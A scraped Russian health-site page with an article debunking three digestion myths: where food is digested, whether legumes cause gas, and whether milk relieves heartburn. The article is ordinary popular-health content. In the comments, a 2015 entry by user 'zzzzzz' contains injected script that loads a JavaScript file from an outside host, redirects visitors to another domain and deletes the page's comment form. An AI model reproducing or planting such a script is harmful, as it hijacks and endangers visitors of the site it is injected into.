Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  3 мифа о пищеварении  >>  3 мифа о пищеварении
 
Обратная связь
 

3 мифа о пищеварении

Размер шрифта
13 декабря 2011 07:13
  • google_analytics: false
  • Нравится

Где переваривается пища? Виноваты ли горох и фасоль в газообразовании? Спасает ли молоко от изжоги? Очевидные ответы на эти вопросы оказываются… неправильными.


Миф 1: Пища переваривается в желудке

Главная функция желудка – обеззараживание пищи и ее отправка в кишечник. Желудочный сок – это смесь соляной кислоты и пепсина, фермента, расщепляющего белки на аминокислоты, которые дальше всасываются в кишечнике. Соляная кислота уничтожает микробы и растворяет пищевые частицы до однородной взвеси.

Где в основном происходит пищеварение?

В кишечнике. Как только туда попадает пища, из поджелудочной железы выделяется сок с ферментами трех типов: амилазой (для углеводов), протеиназой (для белков), липазой (для жиров). Без желчи, которая расщепляет жир, так же не обойтись. Когда все ферменты выделились, начинается пищеварение.

Миф 2: Горох и бобы вызывают газообразование

У каждого человека в желудочно-кишечном тракте есть газы. В желудок они попадают при заглатывании воздуха, а в кишечнике образуются в результате жизнедеятельности бактерий. У здорового человека за сутки в кишечнике образуется до 2 л газов, а частота его выделения может доходить до 20 раз в день. И это даже без гороха и бобов!

Только ли бобовые виноваты в газообразовании?

Основа каловых масс – это вещества, которые наш кишечник не способен переварить. Часть из них, попадая в толстую кишку, подвергаются атаке микроорганизмов. В результате такого «микробного переваривания» и образуются газы.

Микрофлора кишечника расщепляет непереваренные частицы пищи. Избыток недопереваренной пищи в нижних отделах кишечника вызывает бурный рост бактерий, что приводит к повышенному газообразованию.

Пища недопереваривается, когда поджелудочная железа или печень выделяют недостаточно ферментов. Это может случиться, если есть патологии этих органов, или если вы переедаете. Не до конца расщепленная ферментами пища в кишечнике гниет и бродит. Так что виновники повышенного газообразования – не только бобы и горох.

Продукты, вызывающие повышенное газообразование

1. Продукты, вызывающие брожение (квашенная капуста, черный хлеб)
2. Газированная вода
3. Легкоусвояемые углеводы (макароны)

Миф 3: При изжоге помогает молоко

Изжога – это ощущение дискомфорта или жжения за грудиной, когда желудочный сок попадает в пищевод.

Чтобы изжога прошла, необходимо нейтрализовать кислоту. До изобретения специальных лекарств страдающие изжогой использовали обычную соду, которая нейтрализует желудочный сок.

Молоко действительно имеет щелочную реакцию. Но при поступлении молока в кислую среду желудка, кислотность желудочного сока через несколько минут, наоборот, увеличивается. Все потому, что молоко попросту сворачивается, и молочный белок еще активней стимулирует выработку соляной кислоты. Вот почему человек сначала чувствует облегчение, но спустя некоторое время симптомы изжоги только усиливаются. Поэтому изжогу нужно лечить, а не запивать молоком.

Видеосюжеты по теме:

Мифы о желудочно-кишечном тракте. Каким утверждениям не стоит верить 










 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:03

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.